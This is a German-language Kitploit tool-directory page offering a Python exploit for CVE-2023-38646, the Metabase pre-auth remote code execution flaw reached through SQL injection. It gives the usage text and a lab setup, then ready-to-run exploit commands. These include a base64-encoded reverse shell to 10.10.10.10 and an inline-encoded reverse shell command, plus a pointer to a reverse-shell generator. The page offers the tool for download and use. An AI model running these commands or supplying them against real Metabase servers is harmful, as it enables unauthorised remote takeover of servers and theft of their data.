Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38646 — Python-Skript zur Ausnutzung von CVE-2023-38646 Metabase Pre-Auth RCE per SQL-Injection | Kitploit
Tools/GitHubGitHub/red4mber/cve-2023-38646
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubred4mber/cve-2023-38646

CVE-2023-38646

Python-Skript zur Ausnutzung von CVE-2023-38646 Metabase Pre-Auth RCE per SQL-Injection

Repository anzeigen
2vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-38646

Python-Skript zur Ausnutzung von CVE-2023-38646 Metabase Pre-Auth RCE über SQL-Injection

Das Skript ruft GET /api/session/properties ab, um das Setup-Token zu erhalten und die Ausnutzbarkeit des Ziels zu bewerten. Wenn es verwundbar ist, wird dann das Setup-Token ausgegeben, andernfalls beendet es sich nach einer Fehlermeldung.

Wenn die Option -x verwendet wird und das Ziel verwundbar ist, wird der angegebene Payload verwendet, um zu versuchen, die Schwachstelle auszunutzen.

Weitere Informationen in diesem großartigen Write-up von dem Team, das die Schwachstelle entdeckt hat: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

root@kitploit:~
Usage: CVE-2023-38646.py [-h] [-x BASE64 PAYLOAD] url

Metabase Pre-Auth RCE Exploit

positional arguments:
  url                Url of the metabase instance

optional arguments:
  -h, --help         Show this help message and exit
  -x BASE64_PAYLOAD  Exploits the vulnerability

Falls benötigt, kannst du schnell eine Testumgebung in einem Docker-Container einrichten, indem du diesen Befehl verwendest :

root@kitploit:~
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6

Nachdem du http://127.0.0.1:3000/ besucht hast, um das Setup abzuschließen, und einen Listener gestartet hast,
kannst du die RCE mit etwas wie diesem ausnutzen :

root@kitploit:~
python3 ./CVE-2023-38646.py -x c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDQ0MyAwPiYx http://127.0.0.1:3000/

# If you prefer this and use bash (or anything but fish really)
# you should be able to command substitution to encode your payload directly inline like so
python3 ./CVE-2023-38646.py -x $(echo "sh -i >& /dev/tcp/127.0.0.1/4443 0>&1" | base64) http://127.0.0.1:3000/

oder hole dir einfach deine eigene Base64-kodierte Reverse Shell, indem du revshells.com besuchst.

Tool herunterladen